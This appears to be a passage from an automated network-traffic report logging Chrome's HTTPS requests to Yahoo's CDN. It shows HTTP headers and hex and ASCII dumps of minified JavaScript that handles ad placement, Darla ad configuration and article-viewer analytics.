                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 141348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 74 3d 65 2e 62 61 73 65 7c 7c 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 2c 6f 29 7b 69 66 28 65 29 72 65 74 75 72 6e 20 6f 3d 6f 7c 7c 7b 7d 2c 65 2e 75 74 69 6c 73 2e 65 6c 65 6d 65 6e 74 49 6e 56 69 65 77 28 6e 2c 6f 2c 74 2e 76 69 65 77 70 6f 72 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 2c 6f 2c 69 29 7b 72 65 74 75 72 6e 7b 63 6c 65 61 6e 3a 74 2c 64 65 73 74 3a 6e 2c 68 3a 69 2c 6d 65 74 61 53 69 7a 65 3a 21 30 2c 70 6f 73 3a 65 2c 73 75 70 70 6f 72 74 73 3a 21 31 2c 77 3a 6f 7d 7d 76 61 72 20 69 3d 7b 63 6f 6e 74 65 78 74 3a 7b 62 75 63 6b 65 74 3a 22 22 2c 62 75 63 6b 65 74 49 64 3a 22 22 2c 64 65 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(){"use strict";var e=window.wafer,t=e.base||{};function n(n,o){if(e)return o=o||{},e.utils.elementInView(n,o,t.viewport)}function o(e,t,n,o,i){return{clean:t,dest:n,h:i,metaSize:!0,pos:e,supports:!1,w:o}}var i={context:{bucket:"",bucketId:"",dev
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 73 73 6c 3a 74 2e 73 73 6c 2c 75 6c 74 3a 74 2e 75 6c 74 7d 3b 6d 2e 61 64 64 28 64 29 2c 6d 2e 65 76 65 6e 74 28 62 29 7d 7d 28 61 29 7d 29 29 2c 28 73 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 43 2b 28 6e 75 6c 6c 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 70 6f 73 29 29 29 7c 7c 66 2e 65 6e 61 62 6c 65 47 41 4d 41 64 73 29 7b 65 3d 7b 6f 66 66 73 65 74 58 3a 30 2c 6f 66 66 73 65 74 59 3a 70 61 72 73 65 49 6e 74 28 74 2e 6f 66 66 73 65 74 2c 31 30 29 7c 7c 31 30 30 7d 2c 68 2e 6f 6e 28 77 2c 44 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 65 77 65 72 4f 70 65 6e 65 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 52 3d 21 30 7d 29 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 65 61 6d 6c 65 73 73 3a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ssl:t.ssl,ult:t.ult};m.add(d),m.event(b)}}(a)})),(s=d.getElementById(C+(null==r?void 0:r.pos)))||f.enableGAMAds){e={offsetX:0,offsetY:parseInt(t.offset,10)||100},h.on(w,D),c.addEventListener("viewerOpened",(function(){R=!0})),c.addEventListener("seamless:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 29 29 26 26 28 69 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 48 74 2d 70 6c 2d 4c 44 52 42 22 29 2c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 48 74 2d 70 6c 2d 4c 52 45 43 22 29 29 7d 69 66 28 74 2e 4d 4f 4e 32 26 26 74 2e 4c 52 45 43 33 26 26 74 2e 4c 52 45 43 34 29 7b 76 61 72 20 61 3d 74 2e 4d 4f 4e 32 2e 76 61 6c 69 64 41 64 2c 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 73 64 61 2d 4c 52 45 43 33 22 29 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 73 64 61 2d 4c 52 45 43 34 22 29 3b 61 3f 28 73 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 44 28 6e 29 22 29 2c 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 44 28 6e 29 22 29 29 3a 28 73 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ))&&(i.classList.remove("Ht-pl-LDRB"),i.classList.remove("Ht-pl-LREC"))}if(t.MON2&&t.LREC3&&t.LREC4){var a=t.MON2.validAd,s=document.getElementById("sda-LREC3"),r=document.getElementById("sda-LREC4");a?(s.classList.add("D(n)"),r.classList.add("D(n)")):(s.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 73 29 7b 66 6f 72 28 76 61 72 20 6f 2c 69 3d 5b 5d 2c 61 3d 63 2e 70 61 67 65 6c 6f 61 64 4e 6f 6e 43 6f 6c 6c 61 70 73 65 64 41 64 73 2c 73 3d 30 2c 72 3d 5b 22 4c 52 45 43 22 2c 22 4d 41 53 54 22 2c 22 4c 44 52 42 22 2c 22 55 42 41 4c 44 52 42 22 2c 22 55 42 41 4c 52 45 43 22 2c 22 55 42 41 4c 52 45 43 32 22 2c 22 55 42 41 4c 52 45 43 33 22 5d 3b 73 3c 72 2e 6c 65 6e 67 74 68 3b 73 2b 2b 29 7b 76 61 72 20 66 3d 72 5b 73 5d 2c 75 3d 66 3b 69 66 28 61 2e 69 6e 64 65 78 4f 66 28 66 29 3e 3d 30 29 7b 66 2e 69 6e 63 6c 75 64 65 73 28 22 55 42 41 22 29 26 26 28 75 3d 66 2e 73 70 6c 69 74 28 22 55 42 41 22 29 5b 31 5d 29 3b 76 61 72 20 76 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 43 2b 75 29 3b 76 26 26 6e 28 76 29 26 26 69 2e 70 75 73 68 28 66 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s){for(var o,i=[],a=c.pageloadNonCollapsedAds,s=0,r=["LREC","MAST","LDRB","UBALDRB","UBALREC","UBALREC2","UBALREC3"];s<r.length;s++){var f=r[s],u=f;if(a.indexOf(f)>=0){f.includes("UBA")&&(u=f.split("UBA")[1]);var v=d.getElementById(C+u);v&&n(v)&&i.push(f)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 6c 61 73 73 4e 61 6d 65 28 79 29 3b 69 66 28 6e 26 26 6e 2e 6c 65 6e 67 74 68 3e 30 29 7b 6c 2e 72 65 70 6c 61 63 65 57 69 74 68 28 6e 5b 30 5d 29 3b 76 61 72 20 6f 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 79 29 3b 6f 26 26 6f 2e 6c 65 6e 67 74 68 3e 30 26 26 28 6c 3d 6f 5b 30 5d 2c 63 2e 77 61 66 65 72 2e 62 61 73 65 2e 73 79 6e 63 28 6c 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 29 7d 7d 7d 29 29 7d 7d 28 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 2c 6e 29 7b 76 61 72 20 6f 2c 69 2c 61 3d 76 2e 63 6f 6e 74 65 78 74 2c 73 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 2e 62 75 63 6b 65 74 29 3f 61 2e 62 75 63 6b 65 74 2e 6a 6f 69 6e 28 22 2c 22 29 3a 61 2e 62 75 63 6b 65 74 2c 72 3d 7b 70 67 3a 7b 64 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: lassName(y);if(n&&n.length>0){l.replaceWith(n[0]);var o=d.getElementsByClassName(y);o&&o.length>0&&(l=o[0],c.wafer.base.sync(l.parentElement))}}}))}}()}}}function T(e,t,n){var o,i,a=v.context,s=Array.isArray(a.bucket)?a.bucket.join(","):a.bucket,r={pg:{de
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 75 74 69 6c 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 66 69 72 65 42 65 61 63 6f 6e 29 26 26 63 2e 77 61 66 65 72 2e 75 74 69 6c 73 2e 66 69 72 65 42 65 61 63 6f 6e 28 6f 29 7d 6d 3f 4f 28 29 3a 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 64 61 72 6c 61 52 65 61 64 79 4f 6e 41 73 79 6e 63 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4f 28 29 7d 29 29 7d 3b 76 61 72 20 72 2c 6c 2c 63 3d 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 74 72 61 6e 73 66 6f 72 6d 44 61 72 6c 61 43 6f 6e 66 54 6f 4a 61 63 3d 74 2e 73 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: d 0===t?void 0:t.utils)||void 0===n?void 0:n.fireBeacon)&&c.wafer.utils.fireBeacon(o)}m?O():c.addEventListener("darlaReadyOnAsync",(function(){O()}))};var r,l,c=(function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.transformDarlaConfToJac=t.si
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 6e 26 26 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 77 69 64 74 68 2e 6d 69 6e 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2e 66 6c 65 78 2e 77 2e 6d 69 6e 29 2c 31 30 29 29 2c 65 2e 66 6c 65 78 2e 77 2e 6d 61 78 26 26 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 77 69 64 74 68 2e 6d 61 78 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2e 66 6c 65 78 2e 77 2e 6d 61 78 29 2c 31 30 29 29 29 2c 65 2e 66 6c 65 78 2e 68 3f 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 68 65 69 67 68 74 3d 7b 65 6e 61 62 6c 65 64 3a 21 30 7d 2c 65 2e 66 6c 65 78 2e 68 2e 6d 69 6e 26 26 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 68 65 69 67 68 74 2e 6d 69 6e 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2e 66 6c 65 78 2e 68 2e 6d 69 6e 29 2c 31 30 29 29 2c 65 2e 66 6c 65 78 2e 68 2e 6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: n&&(o.flexible.width.min=parseInt(String(e.flex.w.min),10)),e.flex.w.max&&(o.flexible.width.max=parseInt(String(e.flex.w.max),10))),e.flex.h?(o.flexible.height={enabled:!0},e.flex.h.min&&(o.flexible.height.min=parseInt(String(e.flex.h.min),10)),e.flex.h.m
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 65 2e 6c 65 6e 67 74 68 3b 29 6f 2b 2b 2c 69 3d 65 2e 63 68 61 72 41 74 28 6f 29 2c 74 3d 21 30 3b 74 26 26 6f 2d 2d 7d 7d 2c 73 3d 6e 3d 3e 7b 69 66 28 6f 2b 31 3c 65 2e 6c 65 6e 67 74 68 29 7b 66 6f 72 28 69 3d 65 2e 63 68 61 72 41 74 28 6f 2b 31 29 2c 6f 2b 2b 3b 69 21 3d 3d 6e 26 26 6f 2b 31 3c 65 2e 6c 65 6e 67 74 68 3b 29 74 2b 3d 69 2c 69 3d 65 2e 63 68 61 72 41 74 28 6f 2b 31 29 2c 6f 2b 2b 3b 69 21 3d 3d 6e 26 26 28 74 2b 3d 69 29 7d 7d 3b 66 6f 72 28 6f 3d 30 3b 6f 3c 65 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 69 3d 65 2e 63 68 61 72 41 74 28 6f 29 2c 22 3d 22 3d 3d 3d 69 3f 28 74 26 26 28 6e 2e 70 75 73 68 28 74 29 2c 74 3d 22 22 29 2c 61 28 29 29 3a 27 22 27 3d 3d 3d 69 3f 28 74 26 26 28 6e 2e 70 75 73 68 28 74 29 2c 74 3d 22 22 29 2c 73 28 27 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: e.length;)o++,i=e.charAt(o),t=!0;t&&o--}},s=n=>{if(o+1<e.length){for(i=e.charAt(o+1),o++;i!==n&&o+1<e.length;)t+=i,i=e.charAt(o+1),o++;i!==n&&(t+=i)}};for(o=0;o<e.length;o++)i=e.charAt(o),"="===i?(t&&(n.push(t),t=""),a()):'"'===i?(t&&(n.push(t),t=""),s('"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 66 6f 72 6d 44 61 72 6c 61 50 6f 73 69 74 69 6f 6e 43 6f 6e 66 54 6f 4a 61 63 29 28 6e 29 3b 6f 26 26 28 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 26 26 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 2e 68 6f 73 74 55 52 4c 7c 7c 21 67 7c 7c 28 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 7c 7c 28 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 3d 7b 68 6f 73 74 55 52 4c 3a 22 22 7d 29 2c 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 2e 68 6f 73 74 55 52 4c 3d 67 29 2c 28 30 2c 74 2e 75 70 64 61 74 65 52 6f 74 61 74 69 6f 6e 43 6f 6e 66 46 72 6f 6d 41 75 74 6f 45 76 65 6e 74 29 28 75 2c 65 2c 6f 2e 63 6c 69 65 6e 74 29 2c 64 2e 73 65 72 76 69 63 65 2e 70 6f 73 69 74 69 6f 6e 73 5b 65 5d 3d 6f 2e 73 65 72 76 69 63 65 2c 64 2e 63 6c 69 65 6e 74 2e 70 6f 73 69 74 69 6f 6e 73 5b 65 5d 3d 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: formDarlaPositionConfToJac)(n);o&&(o.client.meta&&o.client.meta.hostURL||!g||(o.client.meta||(o.client.meta={hostURL:""}),o.client.meta.hostURL=g),(0,t.updateRotationConfFromAutoEvent)(u,e,o.client),d.service.positions[e]=o.service,d.client.positions[e]=o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 69 6e 65 72 22 29 29 26 26 28 76 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 48 74 2d 70 6c 2d 4c 44 52 42 22 29 7c 7c 76 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 48 74 2d 70 6c 2d 4c 52 45 43 22 29 29 26 26 76 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 48 74 2d 70 6c 2d 4c 44 52 42 22 2c 22 48 74 2d 70 6c 2d 4c 52 45 43 22 29 7d 76 61 72 20 70 3d 6e 75 6c 6c 3d 3d 3d 28 6f 3d 61 2e 72 65 73 70 6f 6e 73 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 70 6f 73 69 74 69 6f 6e 73 3b 69 66 28 70 26 26 70 2e 4d 4f 4e 32 26 26 70 2e 4c 52 45 43 33 26 26 70 2e 4c 52 45 43 34 29 7b 76 61 72 20 6d 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 70 2e 4d 4f 4e 32 2e 63 6f 6e 74 65 6e 74 29 7c 7c 76 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: iner"))&&(v.classList.contains("Ht-pl-LDRB")||v.classList.contains("Ht-pl-LREC"))&&v.classList.remove("Ht-pl-LDRB","Ht-pl-LREC")}var p=null===(o=a.response)||void 0===o?void 0:o.positions;if(p&&p.MON2&&p.LREC3&&p.LREC4){var m=null===(i=p.MON2.content)||vo


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    70192.168.2.44983287.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC546OUTGET /cx/hp-viewer/desktop_1.11.185.modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC627INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: B8eSg3hyCtP+L2XcU3zsHK2OJekowRDPtz4VWED2kyFS7t2ImQfRmRormn8RcR3Rg2jGF/nrU8w=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 10DG02R06MPJXJSF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Thu, 05 Sep 2024 23:23:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 05 Sep 2024 14:01:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "bd4d30bf2431199179fa9afbdb1ccb76"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 65865
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 2138253
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 5b 22 66 69 6e 61 6e 63 65 2e 79 61 68 6f 6f 2e 63 6f 6d 22 2c 22 6e 65 77 73 2e 79 61 68 6f 6f 2e 63 6f 6d 22 2c 22 73 70 6f 72 74 73 2e 79 61 68 6f 6f 2e 63 6f 6d 22 5d 2c 74 3d 6e 65 77 20 52 65 67 45 78 70 28 2f 72 73 3d 22 28 5b 5e 22 5d 2a 29 22 2f 29 2c 69 3d 7b 6c 6d 73 69 64 3a 22 6c 6d 73 69 64 22 2c 6c 70 73 74 61 69 64 3a 22 6c 70 73 74 61 69 64 22 2c 6c 75 3a 22 6c 75 22 2c 70 63 74 3a 22 70 61 67 65 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 70 64 3a 22 70 61 67 65 44 65 73 69 67 6e 22 2c 70 6c 3a 22 70 6c 22 2c 70 74 3a 22 70 61 67 65 54 79 70 65 22 2c 72 65 76 73 70 3a 22 72 65 76 73 70 22 2c 76 65 72 3a 22 61 70 70 4e 61 6d 65 22 7d 2c 73 3d 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(){"use strict";const e=["finance.yahoo.com","news.yahoo.com","sports.yahoo.com"],t=new RegExp(/rs="([^"]*)"/),i={lmsid:"lmsid",lpstaid:"lpstaid",lu:"lu",pct:"pageContentType",pd:"pageDesign",pl:"pl",pt:"pageType",revsp:"revsp",ver:"appName"},s=[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 61 61 73 2c 64 69 76 2e 77 61 66 65 72 2d 63 61 61 73 2d 63 6f 6d 70 6c 65 74 65 22 29 3b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 69 29 2e 66 69 6e 64 49 6e 64 65 78 28 28 74 3d 3e 74 3d 3d 3d 65 29 29 2b 31 7d 2c 75 3d 28 29 3d 3e 77 69 6e 64 6f 77 2e 76 7a 6d 3f 2e 67 65 74 50 61 67 65 43 6f 6e 74 65 78 74 3f 2e 28 29 7c 7c 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 3f 2e 63 6f 6e 74 65 78 74 2c 66 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 75 28 29 3b 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 65 3f 2e 62 75 63 6b 65 74 7c 7c 65 3f 2e 62 75 63 6b 65 74 49 64 7c 7c 22 22 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 63 6f 6e 73 74 20 74 3d 5b 5d 3b 66 6f 72 28 63 6f 6e 73 74 20 69 20 69 6e 20 65 29 69 66 28 65 2e 68 61 73 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: aas,div.wafer-caas-complete");return Array.from(i).findIndex((t=>t===e))+1},u=()=>window.vzm?.getPageContext?.()||window.YAHOO?.context,f=()=>{const e=u();return String(e?.bucket||e?.bucketId||"")};function g(e){const t=[];for(const i in e)if(e.hasOwnProp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 28 65 2c 74 29 3d 3e 7b 69 66 28 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 2e 75 70 64 61 74 65 49 31 33 4e 29 7b 63 6f 6e 73 74 7b 61 64 4d 65 74 61 3a 69 2c 73 70 61 63 65 49 64 3a 73 2c 68 6f 6d 65 70 61 67 65 55 72 6c 3a 6e 2c 70 72 65 73 65 6e 74 61 74 69 6f 6e 3a 61 7d 3d 65 2e 6d 65 74 61 2e 64 61 74 61 2c 72 3d 7b 7d 2c 63 3d 22 66 72 6f 6e 74 70 61 67 65 22 3d 3d 3d 74 7c 7c 22 66 70 22 3d 3d 3d 74 3b 72 2e 73 70 61 63 65 69 64 3d 69 2e 73 70 61 63 65 69 64 7c 7c 73 7c 7c 22 22 2c 69 2e 68 61 73 68 74 61 67 26 26 28 72 2e 68 61 73 68 74 61 67 3d 69 2e 68 61 73 68 74 61 67 2e 73 70 6c 69 74 28 22 3b 22 29 29 2c 63 26 26 69 2e 73 69 74 65 26 26 28 72 2e 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (e,t)=>{if(window.benji&&"function"==typeof window.benji.updateI13N){const{adMeta:i,spaceId:s,homepageUrl:n,presentation:a}=e.meta.data,r={},c="frontpage"===t||"fp"===t;r.spaceid=i.spaceid||s||"",i.hashtag&&(r.hashtag=i.hashtag.split(";")),c&&i.site&&(r.s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 69 65 77 65 72 57 69 6c 6c 4f 70 65 6e 3a 78 2c 6f 6e 56 69 65 77 65 72 4f 70 65 6e 65 64 3a 52 2c 6f 6e 56 69 65 77 65 72 43 6c 6f 73 65 64 3a 54 2c 6f 6e 56 69 65 77 65 72 44 69 64 43 6c 6f 73 65 3a 44 7d 3b 63 6f 6e 73 74 20 42 3d 22 41 55 54 4f 22 2c 46 3d 5b 22 49 4e 41 52 54 49 43 4c 45 22 2c 22 49 4e 41 52 54 49 43 4c 45 2d 31 22 2c 22 57 49 44 47 45 54 22 2c 22 57 49 44 47 45 54 2d 31 22 2c 22 57 49 44 47 45 54 41 22 5d 2c 5f 3d 5b 22 63 61 61 73 2d 69 6d 61 67 65 2d 6c 69 67 68 74 62 6f 78 22 5d 2c 24 3d 7b 61 74 74 3a 22 73 62 63 22 2c 66 72 6f 6e 74 69 65 72 3a 22 66 74 72 22 2c 72 6f 67 65 72 73 3a 22 72 6f 67 65 72 73 2d 61 63 73 22 7d 2c 48 3d 5b 22 57 49 44 47 45 54 41 22 5d 3b 63 6f 6e 73 74 20 57 3d 7b 61 72 74 69 63 6c 65 3a 22 73 74 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: iewerWillOpen:x,onViewerOpened:R,onViewerClosed:T,onViewerDidClose:D};const B="AUTO",F=["INARTICLE","INARTICLE-1","WIDGET","WIDGET-1","WIDGETA"],_=["caas-image-lightbox"],$={att:"sbc",frontier:"ftr",rogers:"rogers-acs"},H=["WIDGETA"];const W={article:"sto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 73 2e 73 70 61 63 65 69 64 3d 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 3f 2e 67 65 74 52 61 70 69 64 41 74 74 72 69 62 75 74 65 28 22 73 70 61 63 65 69 64 22 29 2c 74 68 69 73 2e 6d 61 69 6e 41 72 74 69 63 6c 65 52 61 70 69 64 43 6f 6e 66 69 67 3d 69 2c 74 68 69 73 2e 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 52 61 70 69 64 43 6f 6e 66 69 67 3d 73 7d 6f 6e 56 69 65 77 65 72 57 69 6c 6c 4f 70 65 6e 28 29 7b 74 68 69 73 2e 68 6f 6d 65 55 72 6c 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 74 68 69 73 2e 76 69 65 77 65 64 41 72 74 69 63 6c 65 73 2e 63 6c 65 61 72 28 29 7d 6f 6e 43 6c 69 63 6b 28 65 29 7b 22 73 6c 69 64 65 73 68 6f 77 22 3d 3d 3d 65 2e 74 79 70 65 3f 74 68 69 73 2e 6f 6e 53 6c 69 64 65 73 68 6f 77 43 6c 69 63 6b 28 65 29 3a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s.spaceid=window.rapidInstance?.getRapidAttribute("spaceid"),this.mainArticleRapidConfig=i,this.clusterArticleRapidConfig=s}onViewerWillOpen(){this.homeUrl=location.href,this.viewedArticles.clear()}onClick(e){"slideshow"===e.type?this.onSlideshowClick(e):
